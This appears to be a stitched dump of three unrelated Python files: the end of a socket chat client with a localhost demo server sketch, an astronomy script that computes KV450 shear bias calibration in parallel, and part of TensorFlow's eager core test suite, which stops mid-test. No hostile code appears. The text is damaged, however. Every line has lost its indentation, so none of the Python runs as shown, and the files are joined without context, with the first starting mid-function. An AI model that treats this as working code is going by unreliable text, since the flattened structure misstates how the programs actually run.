message = client.recv(1024).decode(FORMAT)
# if the messages from the server is NAME send the client's name
if message == 'NAME':
client.send(username.encode(FORMAT))
else:
add_text(message)
except:
# an error will be printed on the command line or console if there's an error
print("An error occured!")
client.close()
break
# function to send messages
def sendMessage(self):
message = f"{self.name}: {self.msg}"
client.send(message.encode(FORMAT))
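# --- Illustrative counterpart sketch (an assumption; not the real server) ---
# A minimal server matching the handshake `receive` expects: it sends 'NAME'
# first, reads the username, then echoes one line back. Host and port are
# placeholders.
def _demo_server(host='127.0.0.1', port=5555):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, port))
    srv.listen(1)
    conn, _ = srv.accept()
    conn.send('NAME'.encode(FORMAT))       # ask for the username
    name = conn.recv(1024).decode(FORMAT)  # client answers with `username`
    conn.send(f'welcome, {name}'.encode(FORMAT))
    conn.close()
    srv.close()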
|
4_RunShearBias.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 9 17:49:17 2020
@author: ssli
Script to run the shear bias calibration
Package:
ShearBias.mCalFunc
Data location:
Input: SimCat, KV450/tomo, KV450/split
Output: CosmicShear/shear_bias/
"""
import multiprocessing as mp
import feather
import time
import os
import sys
# Self-defined package
sys.path.insert(0,os.path.realpath('..'))
from ShearBias import mCalFunc
Start = time.time()
# directory to SimCat
inDirSim = "/disks/shear15/ssli/SimCat/"
# directory to KV450 data
inDirReal = "/disks/shear15/ssli/KV450/"
# directory for output
outDir = "/disks/shear15/ssli/CosmicShear/shear_bias/"
# Number of tomographic bins
Nbins = 5
# Number of re-weighting bins
Nbin1 = 20
Nbin2 = 20
# output
outpath_whole = outDir + "Summary_m_whole.csv"
outpath_red = outDir + "Summary_m_less3.csv"
outpath_blue = outDir + "Summary_m_greater3.csv"
#
outfile_whole = open(outpath_whole, "w")
print("bin,m,m_err_BS,m1,m2,m1_err,m2_err,m1_err_BS,m2_err_BS", file=outfile_whole)
outfile_red = open(outpath_red, "w")
print("bin,m,m_err_BS,m1,m2,m1_err,m2_err,m1_err_BS,m2_err_BS", file=outfile_red)
outfile_blue = open(outpath_blue, "w")
print("bin,m,m_err_BS,m1,m2,m1_err,m2_err,m1_err_BS,m2_err_BS", file=outfile_blue)
# for mp
jobs_whole = []
pq_whole = mp.Queue()
jobs_red = []
pq_red = mp.Queue()
jobs_blue = []
pq_blue = mp.Queue()
# MC calculation
for i in range(Nbins):
# for i in range(1):
# simulated data
inpathSim_whole = inDirSim + "SimCatSelec_tomo" + str(i+1) +'.feather'
inpathSim_red = inDirSim + "SimCatSelec_tomo" + str(i+1) +'_TB9_in_less3.feather'
inpathSim_blue = inDirSim + "SimCatSelec_tomo" + str(i+1) +'_TB9_in_greater3.feather'
#
dataSim_whole = feather.read_dataframe(inpathSim_whole)
dataSim_red = feather.read_dataframe(inpathSim_red)
dataSim_blue = feather.read_dataframe(inpathSim_blue)
# real data
inpathReal_whole = inDirReal + 'tomo/all_tomo' + str(i+1) +'.feather'
inpathReal_red = inDirReal + 'split/all_tomo' + str(i+1) +'_T_B_less3.feather'
inpathReal_blue = inDirReal + 'split/all_tomo' + str(i+1) +'_T_B_greater3.feather'
#
dataReal_whole = feather.read_dataframe(inpathReal_whole)
dataReal_red = feather.read_dataframe(inpathReal_red)
dataReal_blue = feather.read_dataframe(inpathReal_blue)
p_whole = mp.Process(target=mCalFunc, args=(i+1, dataSim_whole, dataReal_whole, Nbin1, Nbin2, pq_whole))
p_red = mp.Process(target=mCalFunc, args=(i+1, dataSim_red, dataReal_red, Nbin1, Nbin2, pq_red))
p_blue = mp.Process(target=mCalFunc, args=(i+1, dataSim_blue, dataReal_blue, Nbin1, Nbin2, pq_blue))
jobs_whole.append(p_whole)
p_whole.start()
print("Start running for bin", str(i+1), "in whole data.")
jobs_red.append(p_red)
p_red.start()
print("Start running for bin", str(i+1), "in red data.")
jobs_blue.append(p_blue)
p_blue.start()
print("Start running for bin", str(i+1), "in blue data.")
for p_whole in jobs_whole:
p_whole.join()
for p_red in jobs_red:
p_red.join()
for p_blue in jobs_blue:
p_blue.join()
print("Finished running all.")
print("Start saving data information...")
while not pq_whole.empty():
tmp = pq_whole.get()
print(tmp["id_bin"], tmp["m_final"], tmp['m_err_BS_final'], \
tmp['m1_final'], tmp['m2_final'], \
tmp['m1_err_final'], tmp['m2_err_final'], \
tmp['m1_err_BS_final'], tmp['m2_err_BS_final'], \
sep=',', file=outfile_whole)
outfile_whole.close()
while not pq_red.empty():
tmp = pq_red.get()
print(tmp["id_bin"], tmp["m_final"], tmp['m_err_BS_final'], \
tmp['m1_final'], tmp['m2_final'], \
tmp['m1_err_final'], tmp['m2_err_final'], \
tmp['m1_err_BS_final'], tmp['m2_err_BS_final'], \
sep=',', file=outfile_red)
outfile_red.close()
while not pq_blue.empty():
tmp = pq_blue.get()
print(tmp["id_bin"], tmp["m_final"], tmp['m_err_BS_final'], \
tmp['m1_final'], tmp['m2_final'], \
tmp['m1_err_final'], tmp['m2_err_final'], \
tmp['m1_err_BS_final'], tmp['m2_err_BS_final'], \
sep=',', file=outfile_blue)
outfile_blue.close()
print("All Finished in", time.time()-Start)
# eemmeer (March 15, 2020)
# All Finished in 61.41844892501831 |
core_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return array_ops.identity(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.abc.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.abc.Hashable)
with self.assertRaisesRegex(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning even though we technically shouldn't be able to compare here,
# since the id is the same both TF & numpy will handle lists with the same
# value without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
@test_util.disable_tfrt('Get execution mode not supported in TFRT.')
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
@test_util.disable_tfrt('Multi CPU placement not supported yet.')
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = array_ops.identity(1.0)
with ops.device('cpu:0'):
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('GPU:0'):
x = array_ops.identity(1.0)
self.assertEndsWith(x.device, 'GPU:0')
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, current_device())
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
@test_util.disable_tfrt('Context config not supported in TFRT.')
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegex(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
cpu.__exit__()
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
@test_util.disable_tfrt('ContextFromInterface not implemented.')
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
with ops.device('CPU:0'):
test_var = variables.Variable([2., 3.])
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
self.assertAllEqual(test_fn(test_var), 1.0)
@test_util.disable_tfrt('PyFunc is not supported in TFRT.')
def testPyFunctionAsync(self):
self.skipTest('flaky; b/194307407')
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
result = test_fn(test_var)
context.async_wait()
self.assertAllEqual(result, 3.0)
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tfe.TFE_Py_RegisterExceptionClass(str)
pywrap_tfe.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
# TODO(b/149995282): When an exception is thrown in ASYNC mode, it seems
# there are things left over that cause mutex corruption when
# _reset_context() is called before the next test is executed.
#
# context.set_execution_mode(context.ASYNC)
# with self.assertRaises(errors.InvalidArgumentError):
# execute(
# b'MatMul',
# num_outputs=1,
# inputs=[three, five],
# attrs=('transpose_a', False, 'transpose_b', False, 'T',
# three.dtype.as_datatype_enum))
# context.context().executor.wait()
#
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
@test_util.run_gpu_only
def testMatMulGPUCopyToCPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
with ops.device('CPU:0'):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3.]]),
constant_op.constant([[5.]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Expecting a Dimension for attr shape, got object'):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [object()], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
